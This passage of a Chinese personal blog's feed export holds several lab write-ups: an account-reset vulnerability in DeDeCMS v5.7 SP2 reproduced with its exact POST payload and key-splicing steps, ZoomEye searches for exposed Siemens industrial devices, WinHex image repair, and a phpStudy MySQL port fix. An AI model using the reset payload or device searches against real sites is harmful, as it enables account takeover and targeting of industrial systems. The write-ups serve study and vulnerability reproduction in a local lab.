192.168.10.227</code>进行blast,得到账号:<strong>admin</strong>密码:<strong>password</strong></p><h4 id="查阅资料,永恒之蓝-WannaCry蠕虫利用漏洞的相关信息。"><a href="#查阅资料,永恒之蓝-WannaCry蠕虫利用漏洞的相关信息。" class="headerlink" title="查阅资料,永恒之蓝-WannaCry蠕虫利用漏洞的相关信息。"></a>查阅资料,永恒之蓝-WannaCry蠕虫利用漏洞的相关信息。</h4><p>永恒之蓝利用工具会扫描开放445文件共享端口的Windows机器,所以如果用户开启445端口并且系统未打MS17-010补丁就会在无感状态下被不法分子向系统植入恶意代码。</p><p>例如:WannaCry事件中,不法分子用永恒之蓝攻陷一台机器后会向该机器继续下发并运行永恒之蓝利用工具,让被攻陷的机器继续去扫描其他开放445端口的机器的同时下发并运行勒索病毒,加密用户系统中的文件,达到蠕虫式的传播,从而对全球上百个国家造成巨大影响。</p><h3 id="用ZoomEye查询设备安全问题"><a href="#用ZoomEye查询设备安全问题" class="headerlink" title="用ZoomEye查询设备安全问题"></a>用ZoomEye查询设备安全问题</h3><p>首先搜索西门子公司的工控设备,我这里搜索了两个</p><p><strong>① PLC</strong></p><p><img src="https://img-blog.csdnimg.cn/2020110321591113.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201103220709439.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><strong>② app:”Siemens Building Technologies Climatix WEB Server”</strong></p><p><img src="https://img-blog.csdnimg.cn/20201103220635525.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><img src="https://img-blog.csdnimg.cn/20201103220552460.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h3 id="Winhex简单数据恢复和取证"><a href="#Winhex简单数据恢复和取证" class="headerlink" title="Winhex简单数据恢复和取证"></a>Winhex简单数据恢复和取证</h3><h4 id="WinHex修复图片"><a href="#WinHex修复图片" class="headerlink" title="WinHex修复图片"></a>WinHex修复图片</h4><p>elephant.jpg不能打开了,利用WinHex修复<br>这是elephant.jpg原本的预览样式<br><img src="https://img-blog.csdnimg.cn/20201101224247756.jpg#pic_center" alt="在这里插入图片描述"></p><p>用WinHex打开elephant.jpg发现二进制的文件开头为<strong>00 00</strong>,不符合正常<strong>FF D8</strong>格式</p><p><img src="https://img-blog.csdnimg.cn/20201101224752333.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>所以改为<strong>FF D8</strong></p><p><img src="https://img-blog.csdnimg.cn/20201101225013655.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>另存为jpg文件,修复图片得(因为原图太大,我截图上传的)</p><p><img src="https://img-blog.csdnimg.cn/20201101225253644.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h4 id="WinHex修复图片-1"><a href="#WinHex修复图片-1" class="headerlink" title="WinHex修复图片"></a>WinHex修复图片</h4><p>查看笑脸照片所隐藏的信息</p><p><strong>笑脸原图</strong><br><img src="https://img-blog.csdnimg.cn/20201101225433194.bmp#pic_center" alt="在这里插入图片描述"><br>用WinHex打开这个smile图片并翻到底发现 <strong>tom is the killer</strong> 这条隐藏信息。</p><p><img src="https://img-blog.csdnimg.cn/20201101225558887.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h4 id="U盘数据恢复"><a href="#U盘数据恢复" class="headerlink" title="U盘数据恢复"></a>U盘数据恢复</h4><p>这个没什么技术含量,就是在网上找软件然后扫描U盘并进行恢复,下面是我使用的几款软件</p><p><img src="https://img-blog.csdnimg.cn/20201103213136194.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201103213155572.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/2020110321320996.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>试用版不行,得开vip……</p><p>下一款</p><p><img src="https://img-blog.csdnimg.cn/20201103213314716.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201103213322935.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"><br><img src="https://img-blog.csdnimg.cn/20201103213341652.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>还不是免费的……</p>]]></content>
<summary type="html"><h2 id="实验目的"><a href="#实验目的" class="headerlink" title="实验目的"></a>实验目的</h2><ul>
<li>理解Network scanning&amp;Network investigation的作用;通过搭建Netw</summary>
<category term="Network Penetration" scheme="http://example.com/categories/Network-Penetration/"/>
<category term="experiment" scheme="http://example.com/tags/experiment/"/>
</entry>
<entry>
<title>DeceCMS v5.7 SP2正式版前台任意修改用户密码修改漏洞复现</title>
<link href="http://example.com/2020/10/24/DeceCMS%20v5.7%20SP2%E6%AD%A3%E5%BC%8F%E7%89%88%E5%89%8D%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BF%AE%E6%94%B9%E7%94%A8%E6%88%B7%E5%AF%86%E7%A0%81%E4%BF%AE%E6%94%B9%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/"/>
<id>http://example.com/2020/10/24/DeceCMS%20v5.7%20SP2%E6%AD%A3%E5%BC%8F%E7%89%88%E5%89%8D%E5%8F%B0%E4%BB%BB%E6%84%8F%E4%BF%AE%E6%94%B9%E7%94%A8%E6%88%B7%E5%AF%86%E7%A0%81%E4%BF%AE%E6%94%B9%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/</id>
<published>2020-10-24T14:24:04.000Z</published>
<updated>2022-03-18T06:03:46.012Z</updated>
<content type="html"><![CDATA[<h2 id="一、漏洞限制"><a href="#一、漏洞限制" class="headerlink" title="一、漏洞限制"></a>一、漏洞限制</h2><p>1、只能影响前台账户<br>2、只能修改未设置安全问题的账户</p><h2 id="二、影响版本"><a href="#二、影响版本" class="headerlink" title="二、影响版本"></a>二、影响版本</h2><p>DeDeCMSV5.7SP2 正式版(2018-01-09)</p><h2 id="三、漏洞复现"><a href="#三、漏洞复现" class="headerlink" title="三、漏洞复现"></a>三、漏洞复现</h2><h3 id="复现环境"><a href="#复现环境" class="headerlink" title="复现环境"></a>复现环境</h3><p> PHP 5.6<br> DeDeCMSV5.7SP2 正式版(2018-01-09)</p><h3 id="复现工具"><a href="#复现工具" class="headerlink" title="复现工具"></a>复现工具</h3><p> ① <a href="http://www.dedecms.com/products/dedecms/downloads/">DeDeCMSV5.7SP2 正式版(2018-01-09)</a><br> ② HackBar/Max HacKBar 插件 (后者火狐专有)<br> ③ Proxy SwitchyOmega 插件<br> ④ Burp Suite 抓包工具<br> ⑤ phpstudypro 建站工具<br> ⑥ Google Chrome/Firefox 浏览器</p><h3 id="复现过程"><a href="#复现过程" class="headerlink" title="复现过程"></a>复现过程</h3><h4 id="用phpstudypro建站"><a href="#用phpstudypro建站" class="headerlink" title="用phpstudypro建站"></a>用phpstudypro建站</h4><p> (建站不一定要用这个工具)<br> 这个工具其实建站很简单,可以直接开启Apache和MySQL套件,如图:</p><p> <img src="https://img-blog.csdnimg.cn/20201024200805926.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述" title="建站套件"></p><p>你也可以创个域名,如图:</p><p><img src="https://img-blog.csdnimg.cn/20201024200935495.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述" title="建站域名"></p><p>直接在第一行输入你想起的域名,eg:<a href="http://www.xxxxx.com/">www.xxxxx.com</a>;<br><strong>直接用ip和用域名走接下来的流程我都走过,发现走域名更方便简单一些,后续会详细说明</strong></p><p><em>如果发现MySQL数据库开启了一会儿就又关闭,可以看一看我的另一篇<a href="https://blog.csdn.net/Reaper_MXBG/article/details/109081140">博客</a>,里面有详解</em></p><h4 id="安装DeDeCMS"><a href="#安装DeDeCMS" class="headerlink" title="安装DeDeCMS"></a>安装DeDeCMS</h4><p>流程如下<br>1、下载后把uploads文件移到phpstudy_pro文件的WWW文件下(用域名的需要把uploads文件放在以域名为文件名的文件夹下)</p><p>uploads文件夹<br><img src="https://img-blog.csdnimg.cn/20201024204359181.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述" title="uploads文件夹"><br>用ip和用域名的都把uploads文件夹放在WWW文件夹下,和index.html同级</p><p><img src="https://img-blog.csdnimg.cn/20201024204615907.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>然后用ip的直接访问<a href="http://127.0.0.1/uploads/install/index.php">http://127.0.0.1/uploads/install/index.php</a><br>用域名的直接访问<a href="http://www.week3.com/uploads/install/index.php">http://www.week3.com/uploads/install/index.php</a><br><strong>记住我的链接都是符合我本地路径的,别完全照抄哦</strong><br>会出现如图所示画面</p><p><img src="https://img-blog.csdnimg.cn/20201024210427119.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>继续</p><p><img src="https://img-blog.csdnimg.cn/20201024210549922.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>继续</p><p><img src="https://img-blog.csdnimg.cn/20201024210621473.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>到这一步的的时候注意数据库密码和管理员密码,一般设成和账号名一致就行,方便记忆</p><p>继续</p><p><img src="https://img-blog.csdnimg.cn/20201024210847764.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>登录管理员后台(<strong>这个链接记得保存,后面会用到</strong>)</p><p><img src="https://img-blog.csdnimg.cn/20201024211016524.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>在这里修改一下这个选项为“是”,不然没法注册会员。<br>然后</p><p><img src="https://img-blog.csdnimg.cn/20201024211431637.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>这个站点配置这里算是很关键的一步,你要把原来的ip改成你<strong>无限局域网适配器 WLAN 的IPV4地址</strong>,具体原因我不是很清楚,问朋友说是如果用127.0.0.1的那个ip会进行不停的循环,用Burp Suite抓不到包,所以后续网址的ip我都换成了我的本地ip。</p><h5 id="0x02-设置代理"><a href="#0x02-设置代理" class="headerlink" title="0x02 设置代理"></a>0x02 设置代理</h5><p>为了抓包要设置代理,要用到Proxy SwitchyOmega这个插件,谷歌和火狐都有,自行下载。ip配置成127.0.0.1,端口号配置成8080,这个教程我就不教了哦,很简单的,直接在proxy上填上数字就可以。</p><p><img src="https://img-blog.csdnimg.cn/20201024212338559.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p><strong>后续的网页操作都是要在proxy的代理下进行的,如图选项</strong></p><p><img src="https://img-blog.csdnimg.cn/20201024215337834.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h4 id="Burp-Suite的准备"><a href="#Burp-Suite的准备" class="headerlink" title="Burp Suite的准备"></a>Burp Suite的准备</h4><p>安装的教程我推荐一个<a href="https://blog.csdn.net/LUOBIKUN/article/details/87457545?utm_source=app">博客链接</a>,安路径推荐不含中文,因为路径有中文大概率出问题。<br>安装之后就是如何抓包了,打开走三步</p><p>离开</p><p><img src="https://img-blog.csdnimg.cn/20201024213036249.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>下一个</p><p><img src="https://img-blog.csdnimg.cn/20201024213102509.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>进入Burp</p><p><img src="https://img-blog.csdnimg.cn/20201024213126709.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>然后在到“代理——截断”这里,让状态处于“拦截禁用”的状态</p><p><img src="https://img-blog.csdnimg.cn/20201024213304372.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><h4 id="后续操作"><a href="#后续操作" class="headerlink" title="后续操作"></a>后续操作</h4><p>进入网站首页进行注册操作</p><p><img src="https://img-blog.csdnimg.cn/2020102421425923.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>记住安全问题要选择“没安全提示问题”</p><p>完成注册后可打开前面保存的网站后台网址查看注册的会员的id,就是mid的数值,我注册了两个账号,所以我test(账号名没限制)的mid是3,<strong>这个id记住,后面会用到</strong></p><p>接下来就需要用hackbar了,但是谷歌的hackbar需要破解,火狐的hackbar的破解方我也懒得搞,所以直接用火狐的Max HacKBar插件,功能和hackbar几乎一样</p><p><img src="https://img-blog.csdnimg.cn/20201024215739223.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>按照图里的步骤,先load,再点击post data,然后把dopost=safequestion&safequestion=0.0&safeanswer=&id= 你的用户id<br>这段链接粘贴在框内,id为你注册的用户的id(之前让记的),最后点击Execution这步先别着急,还记得咱们之前打开的处于“拦截禁用”状态的burp吗,点击转变为“拦截请求”状态,然后再点击“Execution”,此时你就会发现burp的界面上有了变化</p><p><img src="https://img-blog.csdnimg.cn/20201024220303625.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>这种界面不是咱们想要的,点击放包,可能需要点击多次,知道看到下面这个界面</p><p><img src="https://img-blog.csdnimg.cn/20201024220400360.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>咱们要的就是这个key,咱们把key=……的部分复制然后在原来id=2的后面加上&key=……,如图</p><p><img src="https://img-blog.csdnimg.cn/20201024220927930.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>(不要在意为啥这张图片的key和抓到的不同,我截图不是一次截完的……)<br>或者你不复制key,直接一直点放包,最后链接上会出现带key的链接,只不过需要你把多于的 ‘amp;’字段删掉,成为和上图一样的链接格式。</p><p>如果发现浏览器打不开链接那就换个浏览器,不过别忘了都开代理。</p><p>然后随便设密码你就会发现登录成功</p><p><img src="https://img-blog.csdnimg.cn/20201024221319251.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="在这里插入图片描述"></p><p>以上就是本次漏洞复现的全过程。</p>]]></content>
<summary type="html"><h2 id="一、漏洞限制"><a href="#一、漏洞限制" class="headerlink" title="一、漏洞限制"></a>一、漏洞限制</h2><p>1、只能影响前台账户<br>2、只能修改未设置安全问题的账户</p>
<h2 id="二、影响版本"><a </summary>
<category term="experiment" scheme="http://example.com/tags/experiment/"/>
</entry>
<entry>
<title>phpStudy Pro的数据库启动一会儿又关闭的解决方法</title>
<link href="http://example.com/2020/10/14/phpStudy%20Pro%E7%9A%84%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%AF%E5%8A%A8%E4%B8%80%E4%BC%9A%E5%84%BF%E5%8F%88%E5%85%B3%E9%97%AD%E7%9A%84%E8%A7%A3%E5%86%B3%E6%96%B9%E6%B3%95/"/>
<id>http://example.com/2020/10/14/phpStudy%20Pro%E7%9A%84%E6%95%B0%E6%8D%AE%E5%BA%93%E5%90%AF%E5%8A%A8%E4%B8%80%E4%BC%9A%E5%84%BF%E5%8F%88%E5%85%B3%E9%97%AD%E7%9A%84%E8%A7%A3%E5%86%B3%E6%96%B9%E6%B3%95/</id>
<published>2020-10-14T11:50:09.000Z</published>
<updated>2022-03-18T06:03:46.018Z</updated>
<content type="html"><![CDATA[<h2 id="问题本质"><a href="#问题本质" class="headerlink" title="问题本质"></a>问题本质</h2><p>这个问题的本质其实是端口被占用(至少我遇到的情况是这样去)</p><h2 id="解决方法步骤"><a href="#解决方法步骤" class="headerlink" title="解决方法步骤"></a>解决方法步骤</h2><h3 id="打开界面上mysql的配置"><a href="#打开界面上mysql的配置" class="headerlink" title="打开界面上mysql的配置"></a>打开界面上mysql的配置</h3><p>如图所示:</p><p><img src="https://img-blog.csdnimg.cn/20201014192538904.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="MYSQL配置" title="MYSQL配置界面"></p><h3 id="打开错误日志选项"><a href="#打开错误日志选项" class="headerlink" title="打开错误日志选项"></a>打开错误日志选项</h3><p><img src="https://img-blog.csdnimg.cn/20201014192743692.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center%22%E9%94%99%E8%AF%AF%E6%97%A5%E5%BF%97%E8%B7%AF%E5%BE%84%22" alt="错误日志路径"></p><h3 id="通过路径找到错误日志"><a href="#通过路径找到错误日志" class="headerlink" title="通过路径找到错误日志"></a>通过路径找到错误日志</h3><p><img src="https://img-blog.csdnimg.cn/20201014192929842.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="ibdata1.err文件" title="ibdata1.err"></p><h3 id="打开错误日志发现问题所在——端口占用"><a href="#打开错误日志发现问题所在——端口占用" class="headerlink" title="打开错误日志发现问题所在——端口占用"></a>打开错误日志发现问题所在——端口占用</h3><p><img src="https://img-blog.csdnimg.cn/20201014193221415.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="3306端口被占用" title="3306端口被占用"></p><h3 id="解决端口占用"><a href="#解决端口占用" class="headerlink" title="解决端口占用"></a>解决端口占用</h3><p>解决端口占用这么简单的操作我就不截图展示了(绝对不是我懒!)<br>命令就那么几条,不过一定要用<strong>管理员模式</strong>开启cmd:</p><h4 id="查询占用端口的PID"><a href="#查询占用端口的PID" class="headerlink" title="查询占用端口的PID"></a>查询占用端口的PID</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">netstat -ano|findstr <span class="number">3306</span></span><br><span class="line"><span class="comment">//这里的3306是我的被占用的端口,每个人可能不同</span></span><br></pre></td></tr></table></figure><h4 id="查询占用端口的程序"><a href="#查询占用端口的程序" class="headerlink" title="查询占用端口的程序"></a>查询占用端口的程序</h4><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">tasklist|findstr <span class="string">"25484"</span></span><br><span class="line"><span class="comment">//25484还是我的,还是因人而异,哈哈</span></span><br></pre></td></tr></table></figure><p>查询到占用的程序是mysql数据库(我觉得一般都是自己之前建的数据库在占用)</p><p><img src="https://img-blog.csdnimg.cn/2020101419402559.jpg#pic_center" alt="占用端口的程序" title="mysqld占用端口"></p><h3 id="释放它!"><a href="#释放它!" class="headerlink" title="释放它!"></a>释放它!</h3><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//你直接杀也行</span></span><br><span class="line">taskkill /pid <span class="number">25484</span> /t /f</span><br><span class="line"><span class="comment">//或者关闭相应程序也行</span></span><br><span class="line">taskkill /f /t /im mysqld.<span class="property">exe</span></span><br></pre></td></tr></table></figure><p>结果</p><p><img src="https://img-blog.csdnimg.cn/20201014194542110.jpg#pic_center" alt="程序终止" title="程序终止"><br><img src="https://img-blog.csdnimg.cn/20201014194634611.jpg?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L1JlYXBlcl9NWEJH,size_16,color_FFFFFF,t_70#pic_center" alt="大功告成" title="大功告成"></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>总结</h2><p>学会找错误日志,学会科学上网(先上网找答案,找不到再说,哈哈哈)。</p>]]></content>
<summary type="html"><h2 id="问题本质"><a href="#问题本质" class="headerlink" title="问题本质"></a>问题本质</h2><p>这个问题的本质其实是端口被占用(至少我遇到的情况是这样去)</p>
<h2 id="解决方法步骤"><a href="#解决</summary>
<category term="note" scheme="http://example.com/tags/note/"/>
<category term="solution" scheme="http://example.com/tags/solution/"/>
</entry>
<entry>
<title>调用摄像头拍照上传</title>
<link href="http://example.com/2020/04/15/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F%E2%80%94%E2%80%94%E8%B0%83%E7%94%A8%E6%91%84%E5%83%8F%E5%A4%B4%E6%8B%8D%E7%85%A7%E4%B8%8A%E4%BC%A0%20%E5%90%8E%E7%AB%AF%EF%BC%9Anode.js/"/>
<id>http://example.com/2020/04/15/%E5%BE%AE%E4%BF%A1%E5%B0%8F%E7%A8%8B%E5%BA%8F%E2%80%94%E2%80%94%E8%B0%83%E7%94%A8%E6%91%84%E5%83%8F%E5%A4%B4%E6%8B%8D%E7%85%A7%E4%B8%8A%E4%BC%A0%20%E5%90%8E%E7%AB%AF%EF%BC%9Anode.js/</id>
<published>2020-04-15T06:54:59.000Z</published>
<updated>2022-03-18T06:03:46.022Z</updated>
<content type="html"><![CDATA[<h2 id="前端部分"><a href="#前端部分" class="headerlink" title="前端部分"></a>前端部分</h2><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">///.wxml</span></span><br><span class="line"><view <span class="keyword">class</span>=<span class="string">"tui-picker-content"</span>></span><br><span class="line"><span class="language-xml"><span class="tag"><<span class="name">button</span> <span class="attr">bindtap</span>=<span class="string">"submitImage"</span>></span>提交照片<span class="tag"></<span class="name">button</span>></span></span></span><br><span class="line"><view></span><br></pre></td></tr></table></figure><figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//js</span></span><br><span class="line"><span class="attr">submitImage</span>:<span class="keyword">function</span>(<span class="params">e</span>){</span><br><span class="line"> <span class="keyword">var</span> that = <span class="variable language_">this</span>;</span><br><span class="line"> <span class="keyword">var</span> roomID = that.<span class="property">data</span>.<span class="property">roomID</span>;<span class="number">0</span></span><br><span class="line"> wx.<span class="title 